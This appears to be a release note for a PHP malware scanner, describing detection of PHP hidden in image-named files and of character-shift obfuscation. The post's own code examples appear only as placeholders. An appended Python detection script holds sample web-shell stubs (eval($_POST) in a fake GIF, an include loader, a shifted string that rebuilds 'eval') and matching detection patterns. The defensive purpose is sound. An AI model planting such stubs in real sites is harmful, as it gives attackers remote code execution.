Today we are proud to announce our next major release 1.25.0.

What has changed?

We introduced a new scan level 1.1 that searches for PHP code hidden in files with image file names. It is a widespread tactic of attackers to hide malicious PHP code inside image files that either contain dummy image data or no image data at all.

For example:

Example 1

This short eval (evil!) code snippet would quickly attract attention when found in a PHP file. But what if it is stored as statistics.gif and the main PHP file contains this:

Example 2

Lines like these are often overlooked when searching for obvious infections.

Furthermore, we improved some heuristic rules for malware scans, including our "Level-4-Scan" that is executed by using the --db-scan switch. For example, it recognizes some indicators of the currently widespread infection of WordPress instances by "Trollherten" through a security issue in the WP GDPR Compliance plugin (you should update to the latest version asap, by the way).

Malware example

A new type of malware that caught our attention hides its malicious behaviour by shifting characters. Here is some simplified dummy code:

Example 3

This is nothing else but

Example 4

or even simpler

Example 5
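As an added illustration (not code from the scanner or from this post), the following Python script shows detection heuristics for both cases described above: PHP open tags or dangerous calls inside files with image extensions, includes of such files from PHP sources, and the chr(ord(...) +/- n) character-shift idiom, with the shift undone so an analyst can see what the loop really builds. The file contents, paths and rule names are constructed assumptions.

```python
import re

# Constructed sample tree (not from the original post): path -> raw bytes.
SAMPLE_FILES = {
    # Real image: GIF header, no PHP inside.
    "img/logo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
    # "Image" that is really PHP: GIF header stub followed by code.
    "img/statistics.gif": b"GIF89a<?php eval($_POST['c']); ?>",
    # Loader that pulls the fake image into the interpreter.
    "index.php": b"<?php include('img/statistics.gif'); echo 'ok'; ?>",
    # Character-shift obfuscation: every byte of $s is shifted back by 1.
    "wp-content/uploads/cache.php": (
        b"<?php $s='fwbm'; $f=''; for($i=0;$i<strlen($s);$i++)"
        b"{ $f.=chr(ord($s[$i])-1); } $f($_POST['c']); ?>"
    ),
}

IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png", ".bmp", ".ico")
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.I)
DANGEROUS_CALL = re.compile(rb"\b(?:eval|assert|create_function|base64_decode|gzinflate)\s*\(", re.I)
# include/require of a path whose name ends in an image extension.
INCLUDE_IMAGE = re.compile(
    rb"\b(?:include|require)(?:_once)?\s*\(?\s*['\"][^'\"]+\.(?:gif|jpe?g|png|bmp|ico)['\"]", re.I)
# chr(ord(...) +/- N): the character-shift idiom; groups capture sign and offset.
CHR_SHIFT = re.compile(rb"chr\s*\(\s*ord\s*\([^()]*\)\s*([+-])\s*(\d+)\s*\)", re.I)

def scan_file(path, data):
    """Return heuristic findings for one file; an empty list means clean."""
    findings = []
    if path.lower().endswith(IMAGE_EXT):
        # An image must never contain a PHP open tag or a code-execution call.
        if PHP_TAG.search(data):
            findings.append("php-tag-in-image")
        if DANGEROUS_CALL.search(data):
            findings.append("dangerous-call-in-image")
    else:
        if INCLUDE_IMAGE.search(data):
            findings.append("include-of-image-file")
        if CHR_SHIFT.search(data):
            findings.append("chr-shift-obfuscation")
    return findings

def reveal_shift(data):
    """Undo chr(ord(c) +/- n) on the first string literal to show what the loop builds."""
    shift, lit = CHR_SHIFT.search(data), re.search(rb"['\"]([^'\"]*)['\"]", data)
    if not shift or not lit:
        return None
    delta = int(shift.group(2)) * (1 if shift.group(1) == b"+" else -1)
    return "".join(chr(b + delta) for b in lit.group(1))

def scan_tree(files):
    """Map each suspicious path to its findings; clean files are omitted."""
    return {p: f for p, f in ((p, scan_file(p, d)) for p, d in files.items()) if f}
```

Running `scan_tree(SAMPLE_FILES)` flags the fake image, its loader and the shifted-character file while leaving the real GIF alone; `reveal_shift` on the shifted file recovers the function name the loop assembles.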

